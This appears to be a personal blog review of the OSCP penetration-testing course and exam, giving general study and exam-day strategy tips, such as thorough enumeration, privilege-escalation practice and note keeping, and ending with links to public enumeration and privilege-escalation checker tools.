OSCP, the pain, the pleasure

Are you ready for the course? the exam?

TLDR

Script out as much as possible in order to save time and avoid fat fingering issues. Enumerate, enumerate, enumerate. Practice privesc’s all the livelong day. Be very familiar with helpful guides such as g0tmilk’s linux privesc guide and the fuzzysec windows privesc guide (or your personal favorites). Transferring files is easy enough… until it isn’t. Don’t neglect to practice various file xfer methods. Did you complete the one exploit tutorial in the course and never learn any more about this? If that’s the case, you’re going to have a long night come exam time. You don’t need to be an expert, that’s what the OSCE is for after all. If you aren’t proficient with writing basic exploits, hit up corelan and follow their basic exploitation tutorials.

My background

It’s important to know a little about someone’s background if you want to understand their perspective. I took the course and exam some time ago but when I did, I already had vast experience in varied aspects cyber operations and often in restrictive environments. I was experienced not only with “hacking”, but also intrusion analysis, and cyber threat analysis. Because of that experience, I had a good intuitive sense for what is normal vs abnormal in windows and linux environments. That proved to be no guarantee of anything however as many systems presented unique challenges in the lab as well as the exam. I have yet to meet anyone who claims to have gained nothing from the labs regardless of experience. Personally, I felt the course was both fun and difficult, while the exam was challenging but fair.

The Labs

There are plenty of reviews out there regarding the labs so I don’t want to repeat too much here. I only completed about 12-15 or so of the lab machines and intentionally sought some of the more challenging ones. The whole point of these machines, besides just being really fun yet paradoxically miserable, is to hone your abilities by exposing you to various difficult situations. A workout session for the hacker mind, if you will. The more you engage the lab machines, the more experience you’ll have for the exam and real engagements as well.

Great note keeping is a must throughout the course and labs. I kept a running notebook using Cherry Tree and documented everything along the way. I had nodes for various scripts, common one liners, and other things for quick reference. I kept very detailed accounts for my actions on targets, but after each successful compromise, I made sure to make a detailed transcript of exactly how it was compromised. Some of the systems are pretty tough and require a bit of research but there are plenty of easy kills as well. If you really need pointers, you can always head to the forums but it’s much more rewarding if you’re able to get there without any nudging.

The Exam

I failed the exam previously because I rushed the enumeration process and ended up chasing my tail for hours trying to catch the fart of a ghost with my bare hands. Don’t do that. Some puzzles are just not meant to be solved. The next time I decided that if my current approach/attack vector hadn’t produced results or didn’t quickly appear to be, I’d rotate to something else.

If I were to emphasize anything, it would be this: Don’t skimp on the enumeration even if it feels slow going. The more you do up front, the more your mind can be at ease later when you realize you’re on a bad path and start wondering what else this target might be open to. Don’t over-think the situation. You shouldn’t have to learn an entire new concept here. You might have to do some research to see how something works, but nothing is on the exam that wasn’t covered in the course material at least in principal. Keep some kind of history of your actions so that you can more easily write the report later.

  • I picked a time that was closer to my normal waking time because I knew if I attempted to work on this for a few hours and then sleep, I’d spend all night going over solutions versus actually resting.
  • I used CherryTree to keep active notes for each target which made reporting much easier.
  • Created a separate terminal for each target, and created tabs as necessary. I used terminator so also split windows as needed. Started a script session for each new window. Ensured the buffer history for the terminal was set to unlimited. I didn’t close a single terminal until I had submitted the report.
  • For each host, did a basic nmap scan for top 1000 ports just to get started.
  • Once I had gotten started looking through those results I kicked off a full scan for each host. I had previously written a script but later found a better one here.
  • I started making a list of potential vulnerabilities based of of the results of the port scans. I didn’t even start attempting to gain access to any host until I had already reviewed the scans and made a prioritized list. Except for one target; something just stood out and I was fortunate that it panned out.
  • For me, the targets that were points-wise supposed to be difficult turned out to be pretty straight forward (don’t confuse that with easy) and I only had to spend a couple of hours on those in total.
  • I had a doozy of a time with the more moderate boxes however. It reminded me of the time when I was a beginner in BJJ, and I kept using my strength to compensate for my complete lack of ability. The instructor had me roll with him and it was miserable. He’d let me get close to something and then just take it away and this went on until finally I threw up. These thing made me feel like a complete scrub. I finally got access on one of them and realized I’d been completely overthinking this thing. Getting privesc was no picnic either. It wasn’t quite as obvious, but it was pretty much in plain sight had I stuck to the plan of avoiding rabbit holes. It’s just that rabbits taste so good!
  • After conquering that truly vexing target, I had the points I needed to pass and decided to get started on the report. I ended up with a nearly finished report before calling it quits for the night.
  • After everything, I think I spent about 12–14 hours total actively at the keyboard before starting on the report. Had I paid better attention, I think that could have been shortened to about 8–10 hours or so.

Useful Links

Useful Tools

www.securitysift.com/download/linuxprivchecker.py
http://www.securitysift.com/download/recon_scan.zip
https://www.rebootuser.com/?p=1758
http://www.darknet.org.uk/2015/10/windows-privesc-check-windows-privilege-escalation-scanner/
https://github.com/GDSSecurity/Windows-Exploit-Suggester
https://github.com/n3ko1/WrapMap
http://www.fuzzysecurity.com/scripts/3.html